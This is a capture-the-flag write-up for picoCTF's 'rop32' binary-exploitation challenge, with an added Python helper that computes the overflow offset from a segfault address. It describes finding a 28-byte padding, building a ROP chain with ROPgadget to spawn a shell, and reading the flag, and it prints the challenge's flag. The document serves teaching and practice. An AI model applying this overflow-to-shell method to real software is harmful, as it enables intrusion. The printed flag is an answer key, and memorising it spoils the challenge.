rop32
Can you exploit the following program to get a flag? You can find the program in /problems/rop32_4_0636b42072627d283f46d2427804b10c on the shell server. Source.
Get the padding by running python2 -c "from pwn import *; print cyclic(50)" | ./vuln, then dmesg | tail to get the segfault address of 0x61616168, then cyclic_find(0x61616168) to get a padding of 'a'*28.
Run python ROPgadget.py --binary ./vuln --rop --badbytes "0a" to get the ROP chain. The --badbytes "0a" option rejects gadgets whose addresses contain a newline byte.
Paste in padding of 'a'*28
Run for remote execution
Run cat flag.txt in the shell that spawns.
picoCTF{rOp_t0_b1n_sH_dee2e288}
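
The padding step above (fault address 0x61616168 giving 28 bytes) can be reproduced without pwntools when triaging a crash. This is an added example, not part of the original writeup; it assumes pwntools' default lowercase alphabet with 4-byte subsequences, and the dmesg line is a constructed sample.

```python
import re
import string
from itertools import islice

ALPHABET = string.ascii_lowercase  # assumption: pwntools' default cyclic alphabet
N = 4  # window size = width of a 32-bit saved return address

def de_bruijn(alphabet=ALPHABET, n=N):
    """Yield a de Bruijn sequence: every n-character window occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def pattern(length):
    """First `length` bytes of the sequence, i.e. what cyclic(length) prints."""
    return "".join(islice(de_bruijn(), length)).encode()

def fault_ip(dmesg_line):
    """Extract the faulting instruction pointer from a kernel segfault line."""
    m = re.search(r"segfault at [0-9a-f]+ ip ([0-9a-f]+)", dmesg_line)
    return int(m.group(1), 16) if m else None

def offset_of(address, length=50):
    """Input bytes that precede the 4 bytes found in `address` (-1 if absent)."""
    needle = address.to_bytes(4, "little")  # x86 stores addresses little-endian
    return pattern(length).find(needle)

# Constructed sample in the kernel's segfault format (PID, sp, error are made up)
SAMPLE = ("[ 1234.567890] vuln[4242]: segfault at 61616168 "
          "ip 0000000061616168 sp 00000000ffd0c1a0 error 14")

if __name__ == "__main__":
    ip = fault_ip(SAMPLE)
    print(hex(ip), "-> offset", offset_of(ip))
```

An offset of -1 means the fault address did not come from the pattern, so the crash has a different cause than an overwritten return address.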